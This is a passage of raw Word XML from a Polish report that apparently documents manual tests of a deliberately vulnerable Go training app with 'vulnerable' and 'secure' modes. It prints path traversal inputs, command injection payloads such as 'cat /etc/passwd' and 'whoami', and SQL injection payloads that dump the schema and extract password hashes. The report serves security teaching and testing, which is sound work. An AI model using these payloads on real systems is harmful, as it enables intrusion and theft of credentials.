          <w:b/>
        </w:rPr>
        <w:t>Konsekwencja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jeśli użytkownicy ponownie używają haseł, wyciek jawnych haseł prowadzi do przejęcia kont również poza aplikacją.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="42" w:name="sec42"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.12. 7. Path Traversal w fanart vault</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/gallery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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../README.md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../app.db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../go.sum</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2057" w:name="lst57"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 57. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2057"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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?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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2058" w:name="lst58"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 58. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2058"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikacja czyta plik spoza katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ścieżka jest normalizowana i musi pozostać wewnątrz katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="43" w:name="sec43"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.13. 8. Command Injection w stream relay check</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/stream-check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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127.0.0.1 &amp;&amp; whoami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x | id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8.8.8.8 ; cat /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2059" w:name="lst59"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 59. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2059"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?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7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6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6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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2060" w:name="lst60"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 60. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2060"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> po </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wykonywana jest dodatkowa komenda systemowa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> regex odrzuca metaznaki, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command("ping", "-c1", host)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nie używa shella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="44" w:name="sec44"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>13. Fragmenty kodu implementacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="45" w:name="sec45"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.1. Routing feature-first</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/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"/ui/library"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PageSearch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"/ui/profile"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ProfileSettings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"/ui/profile"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ProfileSettings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"/ui/profile-secure"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CsrfSecureForm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"/ui/profile-secure"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CsrfSecureForm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"/ui/moderation"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PageIDOR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"/ui/members"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PageDBExpose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"/ui/gallery"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PagePathTraversal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GET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"/ui/stream-check"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PageCmdInjection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61" w:name="lst61"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 61. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2061"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="46" w:name="sec46"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.2. Nawigacja aplikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;a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href=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"/ui/library"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title=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"Search Vocaloid posts and tags"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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🔎</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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Library</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/a&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;a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href=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"/ui/gallery"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title=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"Fanart vault"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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📂</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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Fanart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vault</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/a&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;a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href=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"/ui/stream-check"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title=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"Stream relay health check"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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💻</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;span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Stream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check</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/span&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/a&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2062" w:name="lst62"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 62. Fragment implementacji aplikacji (templ). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2062"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="47" w:name="sec47"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.3. Fanart vault jako realna funkcja</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/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@Layout("Fanart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vault",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securityEnabled,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loggedIn,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username)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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;h1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📂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Fanart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vault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preview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/h1&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;form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method=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"get"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action=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"/ui/gallery"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;input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id=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"pt-name"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name=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"name"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placeholder=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"fanart-miku.png or ../app.db"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/&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/form&gt;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63" w:name="lst63"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 63. Fragment implementacji aplikacji (templ). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2063"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="48" w:name="sec48"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.4. Stream check jako realna funkcja</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/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@Layout("Stream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relay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check",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securityEnabled,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loggedIn,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username)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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;h1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💻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Stream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relay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health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check</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/h1&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;form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method=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"get"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action=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"/ui/stream-check"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="04785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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;input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id=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"cmd-host"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name=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"host"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placeholder=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"8.8.8.8 ; cat /etc/passwd"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/&gt;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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/form&gt;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64" w:name="lst64"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 64. Fragment implementacji aplikacji (templ). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2064"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="49" w:name="sec49"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>14. Diagramy wygenerowane z Mermaid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="50" w:name="sec50"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.1. Przepływ żądania</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50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40680" cy="395559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-flo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95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34" w:name="fig34"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 34. Diagram Mermaid - przepływ żądania. Źródło: diagram Mermaid wygenerowany z opisu architektury.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1034"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="51" w:name="sec51"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.2. Model przełącznika bezpieczeństwa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51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40680" cy="281749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-toggle-stat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817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35" w:name="fig35"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 35. Diagram Mermaid - model przełącznika bezpieczeństwa. Źródło: diagram Mermaid wygenerowany z opisu architektury.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1035"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="52" w:name="sec52"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.3. Drzewo ataku</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/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40680" cy="290771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-tre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0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36" w:name="fig36"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 36. Diagram Mermaid - drzewo ataku. Źródło: diagram Mermaid wygenerowany z opisu architektury.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1036"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="53" w:name="sec53"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>15. Załącznik A: pełne karty testowe funkcji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ten załącznik opisuje testy manualne. Każda karta ma ten sam układ: warunki wejściowe, kroki w aplikacji, żądanie techniczne, oczekiwany wynik podatny, oczekiwany wynik secure oraz kryterium zaliczenia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="54" w:name="sec54"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.1. Karta A1 - Vocaloid library search / SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikacja uruchomiona w trybie vulnerable, baza po seedzie, użytkownik może być niezalogowany. Funkcja jest publiczna, bo wyszukiwarka biblioteki nie wymaga konta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http://localhost:8080/ui/library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 xml:space="preserve">Wpisać zwykłe słowo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i pokazać normalny wynik wyszukiwarki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wpisać sondę logiczną zależną od tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' OR EXISTS(SELECT 1 FROM users WHERE username='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admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' AND substr(password_hash,1,1)='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65" w:name="lst65"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 65. Fragment zapytania lub payloadu SQL. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2065"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Pokazać, że wynik zmienia się nie przez dopasowanie tekstu, tylko przez prawdziwy warunek SQL wykonany na innej tabeli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Wpisać payload rozpoznający schemat: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 1, name, sql, 1, '', '', '' FROM sqlite_master WHERE type='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table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66" w:name="lst66"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 66. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2066"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Pokazać, że wyniki zawierają nazwy tabel i SQL tworzący strukturę bazy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t>Wpisać payload wyciągający użytkowników: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT id, '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user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' || username,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'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role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' || role || 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email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' || email || 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secret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' || password_hash,</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    1, username, '', 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FROM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67" w:name="lst67"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 67. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2067"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pokazać, że wyniki wyszukiwarki zawierają rekordy kont, mimo że użytkownik korzystał tylko z pola </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library query</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:t>Wpisać payload wyciągający ukryte drafty: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zz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
